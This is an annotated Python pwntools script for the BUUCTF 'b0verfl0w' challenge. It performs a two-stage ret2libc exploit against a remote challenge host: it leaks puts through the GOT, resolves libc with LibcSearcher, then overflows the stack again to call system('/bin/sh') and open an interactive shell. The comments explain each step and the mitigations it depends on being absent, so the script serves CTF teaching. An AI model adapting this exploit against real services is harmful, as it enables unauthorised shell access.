是ret2libc类型
# CTF write-up script (BUUCTF "b0verfl0w"): a classic two-stage ret2libc on a
# 32-bit, stack-overflowable binary.  Stage 1 leaks a libc address through
# puts@GOT and returns to main; stage 2 re-triggers the overflow and calls
# system("/bin/sh").  Every step below depends on a mitigation being absent
# (see the per-line notes), which is what makes the script useful as a
# teaching example of why those mitigations exist.
#
# NOTE(review): the script is written Python-2 style — `'a'*36 + p32(...)`
# concatenates str with bytes, which only works on Python 2 / py2-era
# pwntools; on Python 3 this line raises TypeError.  Also `bin` and `sys`
# shadow a builtin and a stdlib module name respectively.
from pwn import *
from LibcSearcher import *
# Remote challenge instance used in the write-up (host/port taken from the page).
p = remote('node3.buuoj.cn',25524)
# Local copy of the target binary; only its symbol tables are read below.
elf = ELF('./b0verfl0w')
# puts@plt: a callable stub at a fixed address; puts@got: the slot holding
# the resolved libc address of puts.  Reading the GOT is the leak primitive —
# it works because the GOT is readable regardless of RELRO level.
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
# Hard-coded address of main.  A fixed 0x0804xxxx address is only meaningful
# if the binary is non-PIE — presumably confirmed with checksec in the
# original write-up; with PIE this value would change every run.
main=0x804850e
# Stage-1 frame: 0x20 bytes of buffer + 4 bytes saved EBP overwrite the
# return address with puts@plt; `main` is the return address *for puts*
# (so the program loops back and can be overflowed again); puts_got is
# puts's first argument, so it prints the libc address of puts.
# A stack canary between the buffer and the return address would stop
# this linear overwrite; the padding size is specific to this binary.
payload='a'*(0x20+4)+p32(puts_plt) + p32(main) +p32(puts_got)
p.sendlineafter("What's your name?",payload)
# Skip program output up to the first '.' (assumed to precede the leaked
# bytes — TODO confirm against the binary's prompt), then take the next
# 4 bytes as the little-endian leaked address of puts.
p.recvuntil('.')
puts_addr=u32(p.recv(4))
# LibcSearcher identifies the remote libc build from the leaked puts
# address (low bits are page-offset invariant under ASLR), then the base
# offset is recovered.  ASLR randomises the libc base only, so one leak
# suffices to compute every other libc address.
libc=LibcSearcher("puts",puts_addr)
offset=puts_addr-libc.dump('puts')
sys=offset+libc.dump('system')
bin=offset+libc.dump('str_bin_sh')
# Stage-2 frame: return into system(); p32(0) is a dummy return address
# for system (the process need not survive); `bin` points at the "/bin/sh"
# string inside libc so no shellcode is needed (NX does not prevent this).
payload='a'*(0x20+4)+p32(sys)+p32(0)+p32(bin)
p.sendlineafter("What's your name?",payload)
# Hand the now-spawned shell over to the user.
p.interactive()